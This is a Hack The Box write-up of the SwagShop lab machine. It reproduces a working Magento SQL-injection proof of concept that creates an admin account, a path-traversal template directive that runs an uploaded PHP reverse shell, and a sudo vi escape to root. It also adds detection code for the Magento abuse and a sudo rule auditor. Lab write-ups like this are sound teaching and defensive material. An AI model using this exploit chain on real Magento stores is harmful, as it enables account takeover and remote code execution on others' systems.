Hack The Box: SwagShop Write-up


Overview

This writeup details the process I used to complete the SwagShop Hack The Box machine. Please be aware that this was not only the first Hack The Box machine I had ever attempted, but also the first time I had attacked any sort of CTF machine. My methodology, note-taking, and resulting documentation were very unrefined, if not completely non-existent, for this machine. I considered going back through this machine to document the process in a manner more in line with my current methodology, then updating this writeup to be more cohesive with the others on this site. I ultimately decided there was some degree of value in leaving this writeup as it is. It can be compared to the more recent writeups, highlighting the development of my skills and methodology over time.

Attack

Exploiting Magento CMS

My first step was to open up Metasploit. Since this was my first time running it, I needed to initialize the database. Once completed, I ran an Nmap scan against the target host.

    msfdb init
    db_nmap -v -sV 10.10.10.140

Once the host was scanned, I checked the database to see what services had been detected as open.

    services
    Services
    ========

    host          port    proto   name    state     info
    ----          ----    -----   ----    -----     ----
    10.10.10.140  22      tcp     ssh     open      OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 Ubuntu Linux; protocol 2.0
    10.10.10.140  80      tcp     http    open      Apache/2.4.18 (Ubuntu)

Since I saw a web server on TCP port 80, I decided to attempt using wmap to enumerate the site directory structure. This resulted in some interesting information, including an XML file that contained SQL credentials. I spent some time attempting to discover a way to abuse the credentials, but this turned out to be a dead end.

At this point I decided to navigate to the web server running on TCP port 80 in my web browser. Branding was prominently displayed and identified the site as being built with the Magento eCommerce CMS. The copyright footer was dated 2014, and after poking around the open FTP directories I was able to find installation notes that listed the exact version of the CMS software. Armed with the version, I was able to find this Python RCE PoC. The code, after my edits, can be seen below.

    #Thanks to
    # Zero cool, code breaker ICA, TEam indishell, my father, rr mam, jagriti and DON
    import base64
    import requests

    target = "http://10.10.10.140/"
    if not target.startswith("http"):
        target = "http://" + target
    if target.endswith("/"):
        target = target[:-1]

    # /index.php was added to the path so it matches this target's URL layout
    target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"
    q = """
    SET @SALT = 'rp';
    SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
    SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
    INSERT INTO `admin_user` (`firstname`, `lastname`, `email`, `username`, `password`, `created`, `lognum`, `reload_acl_flag`, `is_active`, `extra`, `rp_token`, `rp_token_created_at`) VALUES ('Firstname', 'Lastname', 'email@example.com', '{username}', @PASS, NOW(), 0, 0, 1, @EXTRA, NULL, NOW());
    INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
    """

    # collapse the statements onto one line and fill in the account details
    query = q.replace("\n", "").format(username="plsnodelet", password="forme")
    pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

    # e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is {{block type=Adminhtml/report_search_grid output=getCsvFile}}
    r = requests.post(target_url,
                      data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                            "filter": base64.b64encode(pfilter.encode()).decode(),
                            "forwarded": 1})

    if r.ok:
        print("WORKED")
        print("Check {0}/admin with creds plsnodelet:forme".format(target))
    else:
        print("DID NOT WORK DUDE")

I did have to change the target_url variable manually; the original script version had this variable hard-coded to a different IP address. I also had to insert /index.php into the get_url variable in order to properly match the target environment.

Running this script against the target resulted in an admin account being created for Magento CMS. I verified that this account was created by logging in to the Magento CMS admin portal with the defined credentials. At this point I knew I needed to come up with a way to pop a shell, but I wasn't sure how to accomplish that. I searched for Magento vulnerabilities and discovered some documentation on the Froghopper RCE technique. I initially tried to utilize this technique by adding the PHP remote shellcode in the exif data of an image file, but I couldn't successfully trigger the shellcode. I wound up just saving the pentestmonkey PHP reverse shell script with a .jpg file extension in order to upload it to the target.

Once I had uploaded the file to the target, I was able to use the Magento CMS email template preview to execute the PHP payload. I accomplished this by entering a specific string in the email body before clicking the preview button.

    {{block type='core/template' template='../../../../../../media/catalog/category/filename.jpg'}}

After inserting the above line, ensuring my Netcat listener was running on the correct port, and clicking the preview button, I caught the reverse PHP shell on my listener. I was running in the user context of www-data, but I was still able to grab the contents of /home/haris/user.txt.
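Both of the Magento abuses above leave recognisable traces in the request and in the stored template content. The following is an added detection example written for this writeup (not the PoC author's code and not part of Magento): it decodes the base64 form fields of a POST to the Cms_Wysiwyg directive endpoint and flags SQL smuggled into the report grid filter, and separately flags a block directive whose template path traverses out of the theme directory. The sample requests and template body are constructed, not captured traffic.

```python
import base64
import binascii
import re

# Constructed sample values (not captured traffic). The first request has the shape
# of the admin-directive abuse described above; the second is a benign admin POST.
def _b64_field(text):
    return base64.b64encode(text.encode()).decode()

DIRECTIVE_ENDPOINT = "Cms_Wysiwyg/directive/index"
SQL_VERBS = re.compile(r"\b(SET|SELECT|INSERT|UPDATE|DELETE|DROP)\b", re.I)
TRAVERSAL = re.compile(r"\{\{block[^}]*template=['\"][^'\"]*\.\./[^}]*\}\}")

SAMPLE_ATTACK = {
    "path": "/index.php/admin/Cms_Wysiwyg/directive/index/",
    "form": {
        "___directive": _b64_field("{{block type=Adminhtml/report_search_grid output=getCsvFile}}"),
        "filter": _b64_field("popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @A = 1;"),
        "forwarded": "1",
    },
}
SAMPLE_BENIGN = {
    "path": "/index.php/admin/catalog_product/index/",
    "form": {"form_key": "abc123", "filter": _b64_field("sku=shirt-001&qty[from]=1")},
}

def _decode(field):
    """Base64-decode a form field, tolerating the missing padding seen in these requests."""
    padded = field + "=" * (-len(field) % 4)
    try:
        return base64.b64decode(padded).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return ""

def inspect_request(path, form):
    """Return findings for one POST: directive endpoint abuse and SQL smuggled in a grid filter."""
    findings = []
    if DIRECTIVE_ENDPOINT in path and "{{block" in _decode(form.get("___directive", "")):
        findings.append("block directive posted to Cms_Wysiwyg directive endpoint")
    filt = _decode(form.get("filter", ""))
    # A legitimate grid filter is key=value pairs; ');' followed by SQL verbs means the
    # value has closed the intended expression and started its own statements.
    if ");" in filt and SQL_VERBS.search(filt.split(");", 1)[1]):
        findings.append("SQL statements embedded in report grid filter")
    return findings

def inspect_template(body):
    """Flag template directives that resolve a template path by traversing upward."""
    return TRAVERSAL.findall(body)
```

Run inspect_request over decoded POST bodies from a reverse proxy or WAF log, and inspect_template over the cms_block, cms_page and email template tables on a schedule.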

Escalation of Privilege

I had a very difficult time figuring out how to get a full shell to get root on this box. Since this was my first box I did not have any experience with any of the techniques for upgrading from limited to full shells. I eventually figured out that I could execute the following commands in a limited shell in order to upgrade to a full PTY shell without relying on Python or other interpreters.

    bash -i
    script /dev/null

One of the things I did after gaining an interactive shell was to run sudo -l to see if the user I was impersonating had permissions to run any commands as root with sudo. The output from that command included a line that told me that user www-data was able to run vi as root with sudo, as long as the file being opened was in the /var/www/html/ directory path. I then opened a new test file with vi and used the well-known escape method to run an arbitrary command as root.

    sudo vi /var/www/html/test.txt

    !cat /root/root.txt

After executing the above command from within vi the root flag was printed to my terminal.
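The sudo rule that made this escalation possible is easy to audit for. The following is an added example for this writeup (not the box's configuration and not a tool used during the attack): it parses `sudo -l` output and flags rules that hand an editor or pager to another user without the NOEXEC tag, which is the sudoers mitigation for shell escapes (using sudoedit instead of a full editor is the other fix). The `sudo -l` output is constructed to match the shape described above, not copied from the machine.

```python
import re

# Editors and pagers that can run a shell command from inside the program; a sudo
# rule granting them without the NOEXEC tag is effectively a root shell.
SHELL_CAPABLE = {"vi", "vim", "view", "nano", "less", "more", "man"}

# One rule line from `sudo -l`: "(runas) TAG: TAG: /path/cmd args, /path/other".
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")

# Constructed `sudo -l` output (not captured from the machine): the vi rule has the
# shape described above; the less rule shows the NOEXEC mitigation applied.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on host:
    env_reset, mail_badpass

User www-data may run the following commands on host:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
    (root) NOPASSWD: NOEXEC: /usr/bin/less /var/log/apache2/*
    (root) NOPASSWD: /bin/systemctl restart apache2
"""

def parse_sudo_l(output):
    """Return (runas, tags, command) for every rule line in `sudo -l` output."""
    rules = []
    for line in output.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), tags, cmd.strip()))
    return rules

def risky_rules(output):
    """Flag rules that hand out a shell-capable program as another user without NOEXEC."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(output):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_CAPABLE and "NOEXEC" not in tags:
            findings.append(
                f"({runas}) {cmd}: {binary} can spawn a subshell; add NOEXEC or use sudoedit")
    return findings
```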

Final Thoughts

The major issue I had while completing this machine was figuring out how to actually run sudo vi /var/www/html/test.txt. I found out that user www-data had the ability to execute vi with sudo pretty early on in my enumeration process, but the non-interactive shell I was working in kept preventing me from being able to successfully use the command. The process of trying to figure out how to fix the issue led me down some pretty deep rabbit holes because I didn't know the exact phrasing to describe what I needed to accomplish. Once I figured out how to upgrade to an interactive shell without relying on Python being installed on the target machine I was quickly able to finish the box.